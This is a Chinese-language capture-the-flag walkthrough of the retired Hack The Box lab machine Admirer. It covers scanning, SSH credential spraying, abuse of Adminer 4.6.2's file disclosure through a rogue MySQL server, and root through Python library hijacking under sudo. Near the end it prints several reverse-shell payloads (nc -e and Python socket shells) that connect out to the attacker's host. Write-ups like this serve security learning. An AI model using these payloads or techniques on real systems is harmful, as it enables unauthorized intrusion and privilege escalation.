HTB-靶机-Admirer

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.187

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

信息枚举收集
https://github.com/codingo/Reconnoitre 跟autorecon类似
autorecon 10.10.10.187 -o ./Legacy-autorecon

masscan -p1-65535 10.10.10.187 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '
' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.187
sudo nmap -sS -sV -T4 -O -A -v 10.10.10.187

nmap自动探测工具
https://github.com/21y4d/nmapAutomator

爆破目录新工具
https://github.com/phra/rustbuster

发现开放了3个端口，开放的21端口根据显示的版本搜索了下没有找到对应的exploit，22端口也没有找到可以利用的exploit，那么只好看看80端口了，根据得到的信息，显示robots.txt

不允许访问/admin-dir

 再根据靶机的官方提示需要枚举，那进行枚举目录的可能性很大，这里使用一个比较新的工具进行枚举目录

下载二进制文件
wget https://github.com/phra/rustbuster/releases/download/v3.0.3/rustbuster-v3.0.3-x86_64-unknown-linux-gnu -O rustbuster

探测目录
./rustbuster dir -u http://10.10.10.187/admin-dir/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt --threads 20

爆出出来了重要的目录
GET     200 OK                          http://10.10.10.187/admin-dir/contacts.txt
GET     200 OK                          http://10.10.10.187/admin-dir/credentials.txt
使用wget将其下载下来

根据上面的信息提权用户名和密码进行密码爆破

使用cme进行ssh密码测试验证
https://github.com/byt3bl33d3r/CrackMapExec/releases

kali@kali:~/Downloads/htb/admirer$ ./cme ssh 10.10.10.187 -u usernames -p passwords
SSH 10.10.10.187 22 10.10.10.187 [*] SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:w0rdpr3ss01! Authentication failed.

爆破都没有成功，试试上面给出的ftp账号和密码

提取密码关键字信息
kali@kali:~/Downloads/htb/admirer/html$ grep -ir password
utility-scripts/db_admin.php:  $password = "Wh3r3_1s_w4ld0?";
utility-scripts/db_admin.php:  $conn = new mysqli($servername, $username, $password);
index.php:                        $password = "]F7jLHw:*G>UPrTo}~A"d6b";
index.php:                        $conn = new mysqli($servername, $username, $password, $dbname);

或者
grep -i -R "user|pass" ./

然后再翻看下载下来的所有文件，找到了又找到了几个账号和密码，再丢进去试试ssh登录爆破，结果还是失败，回头再看看html目录和phpinfo信息，确认就是网站的根目录，在其中一个目录下发现数据配置连接信息，在此基础上进行枚举

翻看下载下来的文件，找到了可能存在目标靶机的文件及目录
kali@kali:~/Downloads/htb/admirer/html$ cd utility-scripts/
kali@kali:~/Downloads/htb/admirer/html/utility-scripts$ ls
admin_tasks.php  db_admin.php  info.php  phptest.php

再次在改目录下探测下是不是有别的目录
./rustbuster dir -u http://10.10.10.187/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e php,txt --threads 20

最终发现一个管理mysql数据库的文件adminer.php，通过上面FTP账号下载下来发现的数据库账号和密码都不能成功登录到数据库

http://10.10.10.187/utility-scripts/adminer.php

显示当前版本是4.6.2 搜索此版本对应的exploit，发现确实有，可参考：

https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

根据上面文章的提示参考，需要本地kali搭建mariadb数据库然后使用目标靶机的adminer连接本地kali的数据库读取目标靶机正在连接的数据库账号和密码等敏感信息

具体操作细节如下：

开始本地kali安装mysql数据库，开始之前先看看本地缓存有哪些可以安装的数据库
sudo apt-cache search mysql-server
sudo apt-cache search mysql-client

如果没有安装可以按照下面方式安装
sudo apt install mariadb-server-10.3 mariadb-client-10.3

启动数据库mariadb
systemctl start mariadb

如果使用空密码登录不进去就可以在配置50-server.cnf 里面的[mysqld]下添加skip-grant-tables，保存然后重启数据库
systemctl restart mariadb.service

修改密码
use mysql
select user,plugin from mysql.user;
update mysql.user set authentication_string=password('cntf'), plugin = 'mysql_native_password' where user = 'root';
flush privileges;
systemctl restart mariadb.service


操作数据库
CREATE DATABASE backup; USE backup; CREATE TABLE backup (name VARCHAR(2000));
CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY 'redhat';
GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187';

使用下面方式远程登录kali搭建的数据库
10.10.14.2
backup
redhat
backup

LOAD DATA LOCAL INFILE '/opt/scripts/admin_tasks.sh'
INTO TABLE backup.backup
FIELDS TERMINATED BY "
"

执行失败，查看了phpinfo信息发现open_basedir是基于/var/www/html/ 那么使用相对路径试试看
LOAD DATA LOCAL INFILE '../index.php'
INTO TABLE backup.backup
FIELDS TERMINATED BY "
"

选中backup数据库进去得到如下敏感信息
$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

创建数据库backup及用户名并赋予权限

远程登录kali上的数据库

成功登录之后选中数据库执行sql语句，得到如下结果

执行失败，查看了phpinfo信息发现open_basedir是基于/var/www/html/ 那么使用相对路径试试看
LOAD DATA LOCAL INFILE '../index.php'
INTO TABLE backup.backup
FIELDS TERMINATED BY "
"

显示执行成功，然后就可以选中backup数据库进去得到如下敏感信息

$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

得到了账号和密码，试试登录ssh，测试了下成功登录

sshpass -p '&<h5b~yK3F#{PaPB&dA}{H>' ssh waldo@10.10.10.187

执行sudo -l

确认可以通过sudo使用上述方式进行提权，查看了/opt/scripts/admin_tasks.sh脚本 ，最终确认uid等于0的时候执行6进行备份web目录可以用python库文件以root身份操作，那么此处就可以提权root用户

#!/bin/bash

view_uptime()
{
    /usr/bin/uptime -p
}

view_users()
{
    /usr/bin/w
}

view_crontab()
{
    /usr/bin/crontab -l
}

backup_passwd()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_shadow()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_db()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running mysqldump in the background, it may take a while..."
        #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
        /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}



# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;

        *) echo "Unknown option." >&2
    esac

    exit 0
fi


# Interactive way, to be called from the command line
options=("View system uptime"
         "View logged in users"
         "View crontab"
         "Backup passwd file"
         "Backup shadow file"
         "Backup web data"
         "Backup DB"
         "Quit")

echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo "Bye!" ; break ;;

        *) echo "Unknown option." >&2
    esac
done

exit 0

读取执行的python脚本文件内容

waldo@admirer:/opt/scripts$ cat backup.py
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

根据上面显示可以得出是加载模块shutil里面的函数make_archive 那么就可以利用此处新建一个shutil的python脚本文件然后加载函数make_archive再执行命令进行提权

相关python 库劫持可以参考：https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

提权的相关代码内容

import os

def make_archive(h, t, b):
    os.system('nc 10.10.14.2 8833 -e "/bin/bash"')

或者
#!/usr/bin/python3

import os
import pty
import socket

lhost = "10.10.14.2"
lport = 8888

def make_archive(a,b,c):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((lhost, lport))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        os.putenv("HISTFILE",'/dev/null')
        pty.spawn("/bin/bash")
        s.close()

或者

import socket
import pty
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.223",1337))

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")

触发提权
sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 6